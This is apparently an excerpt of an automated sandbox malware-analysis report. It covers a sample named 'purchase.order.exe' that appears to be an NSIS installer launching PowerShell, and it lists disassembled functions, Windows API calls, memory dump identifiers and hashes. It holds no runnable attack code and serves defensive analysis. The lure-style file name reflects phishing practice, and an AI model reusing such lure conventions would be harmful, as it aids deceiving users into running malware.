                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                          • Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
                                          • Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                          • Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                          Function 00401C68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                          • Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
                                          • Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                          • Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                          Function 00404D6D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                          • wsprintfW.USER32 ref: 00404E17
                                          • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s
                                          • API String ID: 3540041739-3551169577
                                          • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                          • Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
                                          • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                          • Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8
                                          Function 00405F18 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                            • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405EC9
                                            • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                            • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                          • lstrlenW.KERNEL32(00425710,00000000,00425710,00425710, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405F71
                                          • GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,774D3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                          • String ID: 4Mw$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 3248276644-3850734506
                                          • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                          • Instruction ID: 8289fae0aeb6f8c8bb33a18b648b52325edb3dacd4d1dfbf908f72671121fed4
                                          • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                          • Instruction Fuzzy Hash: 5EF0F435115E6326E722373A5C49AAF1A04CEC6324B59053BF8A5B22C1DF3C8D5389BE
                                          Function 00405E10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E16
                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E20
                                          • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E32
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E10
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-2145255484
                                          • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                          • Instruction ID: 6241345b1480893618f3385b5901a002ffa6f457481071e3b6de6f74fd74f6f8
                                          • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                          • Instruction Fuzzy Hash: 00D05E71101634AAC2117B48AC08CDF62AC9E46344341402AF141B20A5C7785A5186ED
                                          Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                          • GetTickCount.KERNEL32 ref: 0040306F
                                          • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                          • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                          • String ID:
                                          • API String ID: 2102729457-0
                                          • Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                          • Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
                                          • Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                          • Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C
                                          Function 0040553A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00405569
                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004055BA
                                            • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID:
                                          • API String ID: 3748168415-3916222277
                                          • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                          • Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
                                          • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                          • Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69
                                          Function 0040640F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406680,80000002), ref: 00406455
                                          • RegCloseKey.ADVAPI32(?), ref: 00406460
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue
                                          • String ID: : Completed
                                          • API String ID: 3356406503-2954849223
                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction ID: ab0cc6cc405738cc07c99bf25685dc2411b0540f073fb059e05756a610da7e73
                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction Fuzzy Hash: 4F015E72510209AADF218F51CC05EDB3BA8EB54354F01403AFD5992150D738D968DB94
                                          Function 00403B7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNEL32(?,774D3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B56,00403A6C,?,?,00000008,0000000A,0000000C), ref: 00403B98
                                          • GlobalFree.KERNEL32(00000000), ref: 00403B9F
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Free$GlobalLibrary
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 1100898210-2145255484
                                          • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                          • Instruction ID: 6342289a3e1e3ca18c24491f6708bfd4349b13536718f8c5743bc800c8661b5d
                                          • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                          • Instruction Fuzzy Hash: FBE08C329015205BC6211F19ED04B1A77B86F45B27F06402AE8807B26287B82C838FD8
                                          Function 00405E5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E62
                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E72
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrlen
                                          • String ID: C:\Users\user\Desktop
                                          • API String ID: 2709904686-3080008178
                                          • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                          • Instruction ID: b9e9e75b8ba1df67f9f167ecd7c14c3df7ff164ad8267efb590a8552da577330
                                          • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                          • Instruction Fuzzy Hash: 81D0A7B3400930DAC3127718EC04D9F77ACEF1634074A443AE580B7165D7785D8186EC
                                          Function 00405F96 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
                                          • CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                          • lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                          • Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
                                          • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                          • Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69

                                          Executed Functions

                                          Function 06FBBB4E Relevance: 15.6, Strings: 11, Instructions: 1844COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: tLk$tLk$tLk$tLk$tLk$tLk$x.k$x.k$x.k$-k$-k
                                          • API String ID: 0-3402847943
                                          • Opcode ID: 4bd02f960b54049d735a232454f88336944f522c7ca20a5f99e73480c656d29a
